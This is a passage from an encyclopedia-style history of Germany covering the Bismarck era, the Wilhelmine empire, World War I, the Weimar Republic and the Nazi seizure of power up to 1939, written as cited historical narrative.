Bismarck's domestic policies as Chancellor of Germany were based on his effort to universally adopt the idea of the Protestant Prussian state and achieve the clear separation of church and state in all imperial principalities. In theKulturkampf(lit.: culture struggle) from 1871 to 1878, he tried to minimize the influence of the Roman Catholic Church and its political arm, theCatholic Centre Party, via secularization of all education and introduction of civil marriage, but without success. The Kulturkampf antagonised many Protestants as well as Catholics and was eventually abandoned. The millions of non-German imperial subjects, like the Polish, Danish and French minorities, were left with no choice but to endure discrimination or accept[289][290]the policies ofGermanisation.
The new Empire provided attractive top level career opportunities for the national nobility in the various branches of the consular and civil services and the army. As a consequence the aristocratic near total control of the civil sector guaranteed a dominant voice in the decision making in the universities and the churches. The 1914 German diplomatic corps consisted of 8 princes, 29 counts, 20 barons, 54 representants of the lower nobility and a mere 11 commoners. These commoners were indiscriminately recruited from elite industrialist and banking families. The consular corps employed numerous commoners, that however, occupied positions of little to no executive power.[291]The Prussian tradition to reserve the highest military ranks for young aristocrats was adopted and the newconstitutionput all military affairs under the direct control of the Emperor and beyond control of theReichstag.[292]With its large corps of reserve officers across Germany, the military strengthened its role as"The estate which upheld the nation", and historianHans-Ulrich Wehleradded:"it became an almost separate, self-perpetuating caste".[293]
Power increasingly was centralized among the 7000 aristocrats, who resided in the national capital ofBerlin and neighboring Potsdam. Berlin's rapidly increasing rich middle-class copied the aristocracy and tried to marry into it. A peerage could permanently boost a rich industrial family into the upper reaches of the establishment.[294]However, the process tended to work in the other direction as the nobility became industrialists. For example, 221 of the 243 mines in Silesia were owned by nobles or by the King of Prussia himself.[295]
Themiddle classin the cities grew exponentially, although it never acquired the powerful parliamentary representation and legislative rights as in France, Britain or the United States. TheAssociation of German Women's Organizationsor BDF was established in 1894 to encompass the proliferating women's organizations that had emerged since the 1860s. From the beginning the BDF was abourgeoisorganization, its members working toward equality with men in such areas as education, financial opportunities, and political life. Working-class women were not welcome and were organized by the Socialists.[296]
The rise of the Socialist Workers' Party (later known as theSocial Democratic Party of Germany, SPD), aimed to peacefully establish a socialist order through the transformation of the existing political and social conditions. From 1878, Bismarck tried to oppose the growing social democratic movement byoutlawing the party's organisation, its assemblies and most of its newspapers. Nonetheless, the Social Democrats grew stronger and Bismarck initiated hissocial welfare programin 1883 in order to appease the working class.[297]
Bismarck built on a tradition of welfare programs in Prussia and Saxony that began as early as the 1840s. In the 1880s he introduced old age pensions, accident insurance, medical care, and unemployment insurance that formed the basis of the modernEuropean welfare state. His paternalistic programs won the support of German industry because its goals were to win the support of the working classes for the Empire and reduce the outflow of immigrants to America, where wages were higher but welfare did not exist.[298][299]Bismarck further won the support of both industry and skilled workers by his high tariff policies, which protected profits and wages from American competition, although they alienated the liberal intellectuals who wanted free trade.[300][301]
Bismarck would not tolerate any power outside Germany—as in Rome—having a say in domestic affairs. He launched theKulturkampf("culture war") against the power of the pope and the Catholic Church in 1873, but only in the state of Prussia. This gained strong support from German liberals, who saw the Catholic Church as the bastion of reaction and their greatest enemy. The Catholic element, in turn, saw in theNational-Liberalsthe worst enemy and formed theCenter Party.[302]
Catholics, although nearly a third of the national population, were seldom allowed to hold major positions in the Imperial government, or the Prussian government. After 1871, there was a systematic purge of the remaining Catholics; in the powerful interior ministry, which handled all police affairs, the only Catholic was a messenger boy. Jews were likewise heavily discriminated against.[303][304]
Most of the Kulturkampf was fought out in Prussia, but Imperial Germany passed thePulpit Lawwhich made it a crime for any cleric to discuss public issues in a way that displeased the government. Nearly all Catholic bishops, clergy, and laymen rejected the legality of the new laws and defiantly faced the increasingly heavy penalties and imprisonments imposed by Bismarck's government. Historian Anthony Steinhoff reports the casualty totals:
As of 1878, only three of eight Prussian dioceses still had bishops, some 1,125 of 4,600 parishes were vacant, and nearly 1,800 priests ended up in jail or in exile ... Finally, between 1872 and 1878, numerous Catholic newspapers were confiscated, Catholic associations and assemblies were dissolved, and Catholic civil servants were dismissed merely on the pretence of having Ultramontane sympathies.[305]
Bismarck underestimated the resolve of the Catholic Church and did not foresee the extremes that this struggle would attain.[306][307]The Catholic Church denounced the harsh new laws as anti-Catholic and mustered the support of its rank and file voters across Germany. In the following elections, the Center Party won a quarter of the seats in the Imperial Diet.[308]The conflict ended after 1879 because Pope Pius IX died in 1878 and Bismarck broke with the Liberals to put his main emphasis on tariffs, foreign policy, andattacking socialists. Bismarck negotiated with the conciliatory new popeLeo XIII.[309]Peace was restored, the bishops returned and the jailed clerics were released. Laws were toned down or taken back, but the laws concerning education, civil registry of marriages and religious disaffiliation remained in place. The Center Party gained strength and became an ally of Bismarck, especially when he attacked socialism.[310]
Historians have cited the campaign against the Catholic church, as well as a similar campaign against theSocial Democratic Party, as leaving a lasting influence on the German consciousness, whereby national unity can be encouraged by excluding or persecuting a minority. This strategy, later referred to as "negative integration", set a tone of either being loyal to the government or an enemy of the state, which directly influenced German nationalist sentiment and the later Nazi movement.[311]
Chancellor Bismarck's imperial foreign policy basically aimed at security and the prevention of a Franco-Russian alliance, in order to avoid a likelyTwo-front war. TheLeague of Three Emperorswas signed in 1873 by Russia, Austria, and Germany. It stated thatrepublicanismandsocialismwere common enemies and that the three powers would discuss any matters concerning foreign policy. Bismarck needed good relations with Russia in order to keep France isolated. Russia fought a victoriouswar against the Ottoman Empirefrom 1877 to 1878 and attempted toestablishthePrincipality of Bulgaria, that was strongly opposed by France and Britain in particular, as they were long concerned with the preservation of theOttoman Empireand Russian containment at theBosphorus Straitand the Black Sea. Germany hosted theCongress of Berlinin 1878, where a more moderate peace settlement was agreed upon.
In 1879, Germany formed theDual Alliancewith Austria-Hungary, an agreement of mutual military assistance in the case of an attack from Russia, which was not satisfied with the agreement of the Congress of Berlin. The establishment of the Dual Alliance led Russia to take a more conciliatory stance and in 1887, the so-calledReinsurance Treatywas signed between Germany and Russia. In it, the two powers agreed on mutual military support in the case that France attacked Germany or an Austrian attack on Russia. Russia turned its attention eastward to Asia and remained largely inactive in European politics for the next 25 years. In 1882, Italy, seeking supporters for its interests inNorth Africaagainst France's colonial policy, joined the Dual Alliance, which became theTriple Alliance. In return for German and Austrian support, Italy committed itself to assisting Germany in the case of a French attack.[312]
Bismarck had always argued that the acquisition of overseas colonies was impractical and the burden of administration and maintenance would outweigh the benefits. Eventually, Bismarck gave way, and a number of colonies were established in Africa (Togo, theCameroons,German South-West Africa, andGerman East Africa) and inOceania(German New Guinea, theBismarck Archipelago, and theMarshall Islands). Consequently, Bismarck initiated theBerlin Conferenceof 1885, a formal meeting of the European colonial powers, who sought to "established international guidelines for the acquisition of African territory" (seeColonisation of Africa). Its outcome, theGeneral Act of the Berlin Conference, can be seen as the formalisation of the "Scramble for Africa" and "New Imperialism".[313]
Emperor William I died in 1888. His sonFrederick III, open for a more liberal political course, reigned only for ninety-nine days, as he was stricken with throat cancer and died three months after his coronation. His sonWilhelm IIfollowed him on the throne at the age of 29. Wilhelm rejected the liberal ideas of his parents and embarked on a conservative autocratic rule. He early on decided to replace the political elite and in March 1890 he forced chancellor Bismarck into retirement.[314]Following his principle of "Personal Regiment", Wilhelm was determined to exercise maximum influence on all government affairs.[315][316][317]
The youngKaiser Wilhelmset out to apply his imperialist ideas ofWeltpolitik(German:[ˈvɛltpoliˌtiːk], "world politics"), as he envisaged a gratuitously aggressive political course to increase the empire's influence in and control over the world. After the removal of Bismarck, foreign policies were tackled with by the Kaiser and the Federal Foreign Office underFriedrich von Holstein. Wilhelm's increasingly erratic and reckless conduct was unmistakably related to character deficits and the lack of diplomatic skills.[318][319]The foreign office's rather sketchy assessment of the current situation and its recommendations for the empire's most suitable course of action were:
First a long-term coalition between France and Russia had to fall apart, secondly, Russia and Britain would never get together, and finally, Britain would eventually seek an alliance with Russia.
Subsequently, Wilhelm refused to renew theReinsurance Treatywith Russia. Russia promptly formed a closer relationship with France in theDual Alliance of 1894, as both countries were concerned about the novel disagreeability of Germany. Furthermore, Anglo–German relations provided, from a British point of view, no basis for any consensus as the Kaiser refused to divert from his, although somewhat peculiarly desperate and anachronistic, aggressive imperial engagement and thenaval arms racein particular. Holstein's analysis proved to be mistaken on every point and Wilhelm failed too, as he did not adopt a nuanced political dialogue. Germany was left gradually isolated and dependent on theTriple Alliance, with Austria-Hungary and Italy. This agreement was hampered by differences between Austria and Italy and in 1915 Italy left the alliance.[250]
In 1897, AdmiralAlfred von Tirpitz, state secretary of theGerman Imperial Naval Officedevised his initially rather practical, yet nonethelessambitious planto build a sizeable naval force. Although basically posing only an indirect threat as aFleet in being, Tirpitz theorized, that its mere existence would force Great Britain, dependent on unrestricted movement on the seas, to agree to diplomatic compromises.[320]Tirpitz started the program of warship construction in 1898 and enjoyed the full support of Kaiser Wilhelm. Wilhelm entertained less rational ideas on the fleet, that circled around his romantic childhood dream to have a "fleet of [his] own some day" and his obsessive adherence to direct his policies along the line ofAlfred Thayer Mahan's workThe Influence of Sea Power upon History.[321]In exchange for the eastern African island ofZanzibar, Germany had bargained the island ofHeligolandin theGerman Bightwith Britain in 1890, and converted the island into a naval base and installed immense coastal defense batteries. Britain considered the imperial German endeavours to be a dangerous infringement on the century-old delicate balance of global affairs and trade on the seas under British control. The British, however, resolved to keep up thenaval arms raceand introduced the highly advanced newDreadnoughtbattleship concept in 1907. Germany quickly adopted the concept and by 1910 the arms race again escalated.[322][323]
In theFirst Moroccan Crisisof 1905, Germany nearly clashed with Britain and France when the latter attempted to establish a protectorate over Morocco. Kaiser Wilhelm II was upset at having not been informed about French intentions, and declared their support for Moroccan independence. William II made a highly provocative speech regarding this. The following year, a conference was held in which all of the European powers except Austria-Hungary (by now little more than a German satellite) sided with France. A compromise was brokered by the United States where the French relinquished some, but not all, control over Morocco.[324]
TheSecond Moroccan Crisisof 1911 saw another dispute over Morocco erupt when France tried to suppress a revolt there. Germany, still smarting from the previous quarrel, agreed to a settlement whereby the French ceded some territory in central Africa in exchange for Germany's renouncing any right to intervene in Moroccan affairs. This confirmed French control over Morocco, which became a full protectorate of that country in 1912.[325]
By 1890, the economy continued to industrialize and grow on an even higher rate than during the previous two decades and increased dramatically in the years leading up to World War I. Growth rates for the individual branches and sectors often varied considerably, and periodical figures provided by theKaiserliches Statistisches Amt("Imperial Statistical Bureau) are often disputed or just assessments. Classification and naming of internationally traded commodities and exported goods was still in progress and the structure of production and export had changed during four decades. Published documents provide numbers such as: The proportion of goods manufactured by the modern industry was approximately 25% in 1900, while the proportion of consumer related products in manufactured exports stood at 40%.[326]Reasonably exact are the figures for the entire industrial production between 1870 and 1914, which increased about 500%.[327]
Historian J. A. Perkins argued that more important than Bismarck's new tariff on imported grain was the introduction of the sugar beet as a main crop. Farmers quickly abandoned traditional, inefficient practices in favor of modern methods, including the use of artificial fertilizers and mechanical tools. Intensive methodical farming of sugar and other root crops made Germany the most efficient agricultural producer in Europe by 1914. Even so, farms were usually small in size and women did much of the field work. An unintended consequence was the increased dependence on migratory, especially foreign, labor.[328][329]
The basics of the modern chemical research laboratory layout and the introduction of essential equipment and instruments such asBunsen burners, thePetri dish, theErlenmeyer flask, task-oriented working principles and team research originated in 19th-century Germany and France. The organisation of knowledge acquisition was further refined by laboratory integration in research institutes of the universities and the industries. Germany acquired the leading role in the world'schemical industryby the late 19th century through strictly organized methodology. In 1913, the German chemical industry produced almost 90 per cent of the global supply ofdyestuffsand sold about 80 per cent of its production abroad.[330][331]
Germany became Europe's leading steel-producing nation in the 1890s, thanks in large part to the protection from American and British competition afforded by tariffs and cartels.[332]The leading firm was "Friedrich Krupp AG Hoesch-Krupp", run by theKrupp family.[333]The merger of several major firms into theVereinigte Stahlwerke(United Steel Works) in 1926 was modeled on theU.S. Steelcorporation in the United States. The new company emphasized rationalization of management structures and modernization of the technology; it employed a multi-divisional structure and used return on investment as its measure of success. By 1913, American and German exports dominated the world steel market, as Britain slipped to third place.[334]
In machinery, iron and steel, and other industries, German firms avoided cut-throat competition and instead relied on trade associations. Germany was a world leader because of its prevailing "corporatist mentality", its strong bureaucratic tradition, and the encouragement of the government. These associations regulate competition and allowed small firms to function in the shadow of much larger companies.[335]
By the 1890s, German colonial expansion in Asia and the Pacific (Kiauchauin China, theMarianas, theCaroline Islands,Samoa) led to frictions with Britain, Russia, Japan and the United States.[336]The construction of theBaghdad Railway, financed by German banks, was designed to eventually connect Germany with the Turkish Empire and thePersian Gulf, but it also collided with British and Russian geopolitical interests.[337]
The largest colonial enterprises were in Africa.[338]The harsh treatment of theNamaandHereroin what is nowNamibiain Africa in 1906–1907 led to charges of genocide against the Germans. Historians are examining the links and precedents between theHerero and Namaqua Genocideand theHolocaustof the 1940s.[339][340][341]
Other claimed territories of the German Colonial Empire are:Bear Island(occupied in 1899),[342]Togo-Hinterlands,[343]German Somali Coast,[344]Katanga Territories,Pondoland(failed attempt byEmil Nagel[de]),[345]Nyassaland (Mozambique), Southwestern Madagascar,[346]Santa Lucia Bay (South Africa) (failed attempt in 1884),[347]and the Farasan Islands.[348]
Ethnic demands for nation states upset the balance between the empires that dominated Europe,leading to World War I, which started in August 1914. Germany stood behind its ally Austria in a confrontation with Serbia, but Serbia was under the protection of Russia, which was allied to France. Germany was the leader of the Central Powers, which included Austria-Hungary, the Ottoman Empire, and later Bulgaria; arrayed against them were the Allies, consisting chiefly of Russia, France, Britain, and in 1915 Italy.
In explaining why neutral Britain went to war with Germany, author Paul M. Kennedy recognized it was critical for war that Germany become economically more powerful than Britain, but he downplays the disputes over economic trade imperialism, the Baghdad Railway, confrontations in Central and Eastern Europe, high-charged political rhetoric and domestic pressure-groups. Germany's reliance time and again on sheer power, while Britain increasingly appealed to moral sensibilities, played a role, especially in seeing the invasion of Belgium as a necessary military tactic or a profound moral crime. The German invasion of Belgium was not important because the British decision had already been made and the British were more concerned with the fate of France. Kennedy argues that by far the main reason was London's fear that a repeat of 1870 – when Prussia and the German states smashed France – would mean that Germany, with a powerful army and navy, would control the English Channel and northwest France. British policy makers insisted that would be a catastrophe for British security.[349]
In the west, Germany sought a quick victory by encircling Paris using theSchlieffen Plan. But it failed due to Belgian resistance, Berlin's diversion of troops, and very stiff French resistance on theMarne, north of Paris. TheWestern Frontbecame an extremely bloody battleground oftrench warfare. The stalemate lasted from 1914 until early 1918, with ferocious battles that moved forces a few hundred yards at best along a line that stretched from theNorth Seato the Swiss border. The British imposed a tight naval blockade in the North Sea which lasted until 1919, sharply reducing Germany's overseas access to raw materials and foodstuffs. Food scarcity became a serious problem by 1917.[350]The United States joined with the Allies in April 1917. The entry of the United States into the war – following Germany's declaration of unrestricted submarine warfare – marked a decisive turning-point against Germany.[351]
Total casualties on the Western Front were 3,528,610 killed and 7,745,920 wounded.[352]
More wide open was the fighting on theEastern Front. In the east, there were decisive victories against the Russian army, the trapping and defeat of large parts of the Russian contingent at theBattle of Tannenberg, followed by huge Austrian and German successes. The breakdown of Russian forces – exacerbated by internal turmoil caused by the 1917Russian Revolution– led to theTreaty of Brest-Litovskthe Bolsheviks were forced to sign on 3 March 1918 as Russia withdrew from the war. It gave Germany control of Eastern Europe. Spencer Tucker says, "The German General Staff had formulated extraordinarily harsh terms that shocked even the German negotiator."[353]When Germany later complained that theTreaty of Versaillesof 1919 was too harsh on them, the Allies responded that it was more benign than Brest-Litovsk.[354]
By defeating Russia in 1917, Germany was able to bring hundreds of thousands of combat troops from the east to the Western Front, giving it a numerical advantage over the Allies. By retraining the soldiers in new storm-trooper tactics, the Germans expected to unfreeze the Battlefield and win a decisive victory before the American army arrived in strength.[355]However, the spring offensives all failed, as the Allies fell back and regrouped, and the Germans lacked the reserves necessary to consolidate their gains. In the summer, with the Americans arriving at 10,000 a day, and the German reserves exhausted, it was only a matter of time before multiple Allied offenses destroyed the German army.[356]
Although war was not expected in 1914, Germany rapidly mobilized its civilian economy for the war effort, the economy was handicapped by the British blockade that cut off food supplies.[357]
Steadily conditions deteriorated rapidly on the home front, with severe food shortages reported in all urban areas. Causes involved the transfer of many farmers and food workers into the military, an overburdened railroad system, shortages of coal, and especially the British blockade that cut off imports from abroad. The winter of 1916–1917 was known as the "turnip winter", because that vegetable, usually fed to livestock, was used by people as a substitute for potatoes and meat, which were increasingly scarce. Thousands of soup kitchens were opened to feed the hungry people, who grumbled that the farmers were keeping the food for themselves. Even the army had to cut the rations for soldiers.[358]Morale of both civilians and soldiers continued to sink. According to historianWilliam H. MacNeil:
1918 was the year of the deadly1918 Spanish Flu pandemicwhich struck hard at a population weakened by years of malnutrition.
In October 1918,General Ludendorff, who wanted to protect the reputation of the Imperial Army by placing responsibility for the capitulation on the democratic parties and theImperial Reichstag, pushed for the government to be democratised. A newchancellorwas appointed, members of the Reichstag's majority parties were brought into the cabinet for the first time and theconstitution modified.[360]The moves did not, however, satisfy either theAlliesor the majority of German citizens.
TheGerman revolution of 1918–1919began on 3 November with asailor's mutiny at Kielwhich spread rapidly and all but bloodlessly across Germany. Within a week,workers' and soldiers' councilswere in control of government and military institutions across most of the Reich.[361]On 9 November, Germany wasdeclared a republic. The following day, theCouncil of the People's Deputies, formed from members of Germany's two main socialist parties, began acting as the provisional government. By the end of the month, all of Germany'sruling monarchs, including Emperor Wilhelm II, who had fled to exile in the Netherlands, had been forced to abdicate.[362]
In early January 1919, theSpartacist uprisingled by the newly foundedCommunist Party of Germanyattempted to take power in Berlin, but it was quashed by government andFreikorpstroops. Into the spring there were additional violently suppressed efforts to push the revolution further in the direction of acouncil republic, such as the short-lived local soviet republics, notably inBavaria(Munich). They too were put down with considerable loss of life.[363]
The revolution's end is generally set at 11 August 1919, the day theWeimar Constitutionwas signed following its adoption by the popularly electedWeimar National Assembly, Even though the widespread violence largely ended in 1919, the revolution remained in many ways incomplete. A large number of its opponents had been left in positions of power in the military and the Reich administration, and it failed to resolve the fracture in the Left between moderate socialists and communists. The Weimar Republic as a result was beset from the beginning by opponents from both the Left and – to a greater degree – the Right.[364]
Under the peace terms of theTreaty of Versailles, Germany's first democracy began its fourteen-year life facing territorial losses,reparations to the victorsof World War I and stringent limitations on its military. Political violence from those on the Right who wanted a return to the monarchy and those on the Left who wanted a soviet-style regime repeatedly threatened the moderate socialist government through 1923. Ongoing issues with state finances, impacted by war debt and the funding of striking workers in the Ruhr, fuelled thehyperinflation of 1923that impoverished many Germans and left them bitter enemies of the Republic. A period of relative political and economic stability that lasted until the onset of theGreat Depressionin 1929 was followed by the rapid growth of parties on the extremes – theCommunistson the Left and theNazison the Right – that left theReichstag(parliament) all but unable to function. In quick succession, fourchancellorstried and failed to govern by decree beforePresident HindenburgnamedAdolf Hitlerchancellor in 1933. In only a few months he had turned the Republic into a Nazi dictatorship.
TheArmistice of 11 November 1918ended the fighting in World War I, and on 28 June 1919 Germany reluctantly signed the peace terms laid out in theTreaty of Versailles. Germany had to renounce sovereignty over its colonies[365]and in Europe lost 65,000 km2(25,000 sq mi) or about 13% of its former territory – including 48% of its iron and 10% of its coal resources – along with 7 million people, or 12% of its population.[366]Allied troopsoccupied the Rhineland, and it along with an area stretching 50 kilometres east of the Rhine were demilitarized.[367]The German army was limited to no more than 100,000 men with 4,000 officers and no general staff; the navy could have at most 15,000 men and 1,500 officers. Germany was prohibited from having an air force, submarines ordreadnoughts. A large number of its ships and all of its air-related armaments were to be surrendered.[368][369]The most contentious article of the treaty, the so-calledWar Guilt Clause(Article 231), stated that Germany accepted responsibility for the loss and damage from the war caused to the Allies, and therefore had to pay reparations for the damage caused to the Allied Powers.[370]
The treaty was reviled as a dictated rather than a negotiated peace.Philipp Scheidemann, theSocial Democraticminister president of Germany, said to theWeimar National Assemblyon 12 May 1919, "What hand should not wither that puts this fetter on itself and on us?"[371]
TheWeimar Constitutionestablished a federalsemi-presidential republicwith achancellordependent on the confidence of theReichstag(parliament), a strong president who had considerablepowers to govern by decree,[372]and a substantial set of individual rights.[373]The Social DemocratFriedrich Ebertwas the Republic's first president.
The Left accused the Social Democrats of betraying the ideals of the labour movement because of their alliance with the old elites in the military and administration, and the Rightheld the supporters of the Republic responsiblefor Germany's defeat in the war.[374]In early 1920, the right-wingKapp Putsch, backed by units of the paramilitaryFreikorps, briefly took control of the government in Berlin, but the putsch quickly collapsed due to a general strike and passive resistance by civil servants.[375]In the putsch's wake, workers in the industrialRuhr district, where dissatisfaction with the lack of nationalisation of key industries was particularly high, rose up and attempted to take control of the region.Reichswehrand Freikorps units suppressed theRuhr uprisingwith the loss of over 1,000 lives.[376]The unstable political conditions of the period were reflected in theReichstag election of 1920, in which the centre-leftWeimar Coalition, which until then had held a three-quarters majority, lost 125 seats to parties on both the Left and Right.[377]
Political violence continued at a high level through 1923. Aright-wing extremist groupassassinated former finance ministerMatthias Erzbergerin August 1921 andWalther Rathenau, the Jewish foreign minister, in June 1922.[378]1923 saw the communist-led takeover attempt known as theGerman October, the right-wingKüstrin PutschandAdolf Hitler'sBeer Hall Putsch.
Germany was the first state to establish diplomatic relations with the newSoviet Unionin the 1922Treaty of Rapallo.[379]In October 1925, Germany, France, Belgium, Britain and Italy signed theTreaty of Locarno, which recognised Germany's borders with France and Belgium but left its eastern borders open to negotiations. The treaty paved the way for Germany's admission to theLeague of Nationsin 1926.[380]
In May 1921 the Allied Powers set Germany's reparations liability under the terms of the Treaty of Versailles at 132 billion Reichsmarks, to be paid either in gold or commodities such as iron, steel and coal.[381]After a series of German defaults, French and Belgian troopsoccupied the Ruhrin January 1923. The German government responded with a policy of passive resistance. It underwrote the costs of idled factories and mines and paid the workers who were on strike. Unable to meet the enormous costs by any other means, it resorted to printing money. Along with the debts the state had incurred during the war, it was one of the major causes of the 1923 peak inGermany's post-war hyperinflation.[382]The passive resistance was called off in September 1923, and the occupation ended in August 1925, following an agreement (theDawes Plan) to restructure Germany's reparations.[383]In November 1923 the government introduced a new currency, theRentenmark(later theReichsmark). Together with other measures, it quickly stopped the hyperinflation, but many Germans who lost their life savings became bitter enemies of the Weimar Republic and supporters of the anti-democratic Right.[384]During the following six years the economic situation improved. In 1928 Germany's industrial production surpassed the pre-war level of 1913.[385]
In 1925, following the death in office of President Ebert, conservative Field MarshalPaul von Hindenburgwaselectedto replace him. His presidency, coming after a campaign that emphasised nationalism and Hindenburg's ties to the fallen German Empire, was the beginning of a significant shift to the right in German politics.[386]
TheWall Street crash of 1929marked the beginning of the worldwideGreat Depression, which hit Germany as hard as any nation. In 1931 severalmajor banks failed, and by early 1932 the number of unemployed had soared to more than six million.[387]In theReichstag election of September 1930, theCommunist Party of Germany(KPD) gained 23 seats, while theNational Socialist German Workers' Party(NSDAP, Nazi Party), until then a minor far-right party, increased its share by 95 seats, becoming Germany's second largest party behind the Social Democrats.[388]The Nazis were particularly successful among Protestants, unemployed young voters, the lower middle class in the cities and the rural population. It was weakest in Catholic areas and in large cities.[389]The shift to the political extremes made the unstable coalition system by which every Weimar chancellor had governed increasingly unworkable. The last years of the Weimar Republic were marred by even more systemic political instability than previous years, and political violence increased. Four chancellors (Heinrich Brüning,Franz von Papen,Kurt von Schleicherand, from 30 January to 23 March 1933,Adolf Hitler) governed throughpresidential decreerather than parliamentary consultation.[381]It effectively rendered the Reichstag powerless as a means of enforcing constitutionalchecks and balances.
Hindenburg wasre-elected president in 1932, out-polling Hitler by almost 6 million votes in the second round.[390]The Nazi Party became the largest party in the Reichstag following theelection of July 1932. It received 37% of the vote, with the SPD second (22%) and the Communist KPD third at 14%. The Nazis dropped to 33% after anotherelection four months later, but they remained the largest party. The splintered Reichstag was still unable to form a stable coalition. On 30 January 1933, seeing no other viable option and pressured by former chancellorFranz von Papenand other conservatives, President Hindenburg appointed Hitler chancellor.[391]
The Weimar years saw a flowering ofGerman scienceand high culture, before the Nazi regime resulted in a decline in the scientific and cultural life in Germany and forced many renowned scientists and writers to flee.
German recipients dominated theNobel prizes in science.[392]Germany dominated the world of physics before 1933, led byHermann von Helmholtz,Wilhelm Conrad Röntgen,Albert Einstein,Otto Hahn,Max PlanckandWerner Heisenberg. Chemistry likewise was dominated by German professors and researchers at the great chemical companies such asBASFandBayerand persons likeJustus von Liebig,Fritz HaberandEmil Fischer. Theoretical mathematiciansGeorg Cantorin the 19th century andDavid Hilbertin the 20th century.Karl Benz, the inventor of the automobile, andRudolf Dieselwere pivotal figures of engineering, andWernher von Braun, rocket engineer.Ferdinand Cohn,Robert KochandRudolph Virchowwere three key figures in microbiology.
Among the most important German writers wereThomas Mann,Hermann HesseandBertolt Brecht. The reactionary historianOswald SpenglerwroteThe Decline of the West(1918–1923) on the inevitable decay of Western Civilization, and influenced intellectuals in Germany such asMartin Heidegger,Max Scheler, and theFrankfurt School, as well as intellectuals around the world.[393]
After 1933, Nazi proponents of "Aryan physics", led by the Nobel Prize-winnersJohannes StarkandPhilipp Lenard, attacked Einstein's theory of relativity as a degenerate example of Jewish materialism in the realm of science. Many scientists and humanists emigrated; Einstein moved permanently to the U.S. but some of the others returned after 1945.[394][395]
The Nazi regime suppressed labor unions and strikes, leading to prosperity which gave theNazi Partypopularity, with only minor, isolated and subsequently unsuccessful cases ofresistance among the German populationover their rule. TheGestapo(secret police) destroyed the political opposition and persecuted the Jews, trying to force them into exile. The Party took control of the courts, local government, and all civic organizations except the Christian churches. All expressions of public opinion were controlled the propaganda ministry, which used film, mass rallies, and Hitler's hypnotic speaking. The Nazi state idolized Hitler as its Führer (leader), putting all powers in his hands.Nazi propagandacentered on Hitler and created the "Hitler Myth"—that Hitler was all-wise and that any mistakes or failures by others would be corrected when brought to his attention.[396]In fact Hitler had a narrow range of interests and decision making was diffused among overlapping, feuding power centers; on some issues he was passive, simply assenting to pressures from whoever had his ear. All top officials reported to Hitler and followed his basic policies, but they had considerable autonomy on a daily basis.[397]
To secure aReichstagmajority for his party, Hitler called for new elections. After the 27 February 1933Reichstag fire, Hitler swiftly blamed an alleged Communist uprising, and convinced President Hindenburg to approve theReichstag Fire Decree, rescinding civil liberties. Four thousandcommunistswere arrested[398]and Communist agitation was banned. Communists and Socialists were brought into hastily preparedNazi concentration camps, where they were at the mercy of theGestapo, the newly established secret police force. CommunistReichstagdeputies were taken into "protective custody".
Despite the terror and unprecedented propaganda, the last free General Elections of 5 March 1933, while resulting in 43.9% failed to give the Nazis their desired majority. Together with theGerman National People's Party(DNVP), however, he was able to form a slim majority government. On 23 March 1933, theEnabling Actmarked the beginning of Nazi Germany,[399]allowing Hitler and his cabinet to enact laws on their own without the President or the Reichstag.[400]The Enabling Act formed the basis for the dictatorship and the dissolution of theLänder. Trade unions and all political parties other than the Nazi Party were suppressed. A centralised totalitarian state was established, no longer based on the liberalWeimarconstitution. Germany withdrew from theLeague of Nationsshortly thereafter. The coalition parliament was rigged by defining the absence of arrested and murdered deputies as voluntary and therefore cause for their exclusion as wilful absentees. The Centre Party was voluntarily dissolved in aquid pro quowith thePopeunder theanti-communistPope Pius XIfor theReichskonkordat; and by these manoeuvres Hitler achieved movement of these Catholic voters into the Nazi Party, and a long-awaited international diplomatic acceptance of his regime. The Nazis gained a larger share of their vote in Protestant areas than in Catholic areas.[401]The Communist Party was proscribed in April 1933.
Hitler used theSSand Gestapo to purge the entire SA leadership—along with a number of Hitler's political adversaries in theNight of the Long Knivesfrom 30 June to 2 July 1934.[402]As a reward, the SS became an independent organisation under the command of theReichsführer-SSHeinrich Himmler. Upon Hindenburg's death on 2 August 1934, Hitler's cabinet passed a law proclaiming the presidency to be vacant and transferred the role and powers of the head of state to Hitler.
The Nazi regime was particularly hostile towards Jews, who became the target of unendingantisemiticpropaganda attacks. The Nazis attempted to convince the German people to view and treat Jews as "subhumans"[403]and immediately after the1933 federal electionsthe Nazis imposed a nationwideboycott of Jewish businesses. In March 1933 the firstNazi concentration campwas established atDachau[404]and from 1933 to 1935 the Nazi regime consolidated their power. TheLaw for the Restoration of the Professional Civil Serviceforced all Jewish civil servants to retire from the legal profession and the civil service.[405]TheNuremberg Lawsbanned sexual relations between Jews and Germans and only those of German or related blood were eligible to be considered citizens; the remainder were classed as state subjects, without citizenship rights.[406]This stripped Jews,Romaniand others of their legal rights.[407]Jews continued to suffer persecution under the Nazi regime, exemplified by theKristallnacht pogromof 1938, and about half of Germany's 500,000 Jews fled the country before 1939, after which escape became almost impossible.[408]
In 1941, the Nazi leadership decided to implement a plan that they called the "Final Solution" which came to be known as theHolocaust. Under the plan, Jews and other "lesser races" along with political opponents from Germany as well asoccupied countrieswere systematically murdered at murder sites, and starting in 1942, atextermination camps.[409]Between 1941 and 1945 Jews, Gypsies, Slavs, communists, homosexuals, the mentally and physically disabled and members of other groups were targeted and methodically murdered – the origin of the word "genocide". In total approximately 11 million people were killed during the Holocaust.[410]
In 1935, Hitler officially re-established theLuftwaffe(air force) and reintroduced universal military service, in breach of theTreaty of Versailles; Britain, France and Italy formally protested. Hitler had the officers swear their personal allegiance to him.[411]In 1936, German troopsmarched into the demilitarised Rhineland.[412]As the territory was part of Germany, the British and French governments did not feel that attempting to enforce the treaty was worth the risk of war.[413]The move strengthened Hitler's standing in Germany. His reputation swelled further with the1936 Summer Olympicsin Berlin, and proved another great propaganda success for the regime as orchestrated by master propagandistJoseph Goebbels.[414]
Hitler's diplomatic strategy in the 1930s was to make seemingly reasonable demands, threatening war if they were not met. When opponents tried to appease him, he accepted the gains that were offered, then went to the next target. That aggressive strategy worked as Germany pulled out of theLeague of Nations, rejected theVersailles Treatyand began to re-arm, won back the Saar, remilitarized the Rhineland, formed an alliance with Mussolini's Italy, sent massive military aid to Franco in the Spanish Civil War, annexed Austria, took over Czechoslovakia after the British and Frenchappeasementof the Munich Agreement, formed a peace pact withJoseph Stalin's Soviet Union, and finally invaded Poland. Britain and France declared war on Germany andWorld War IIin Europe began.[415][416]
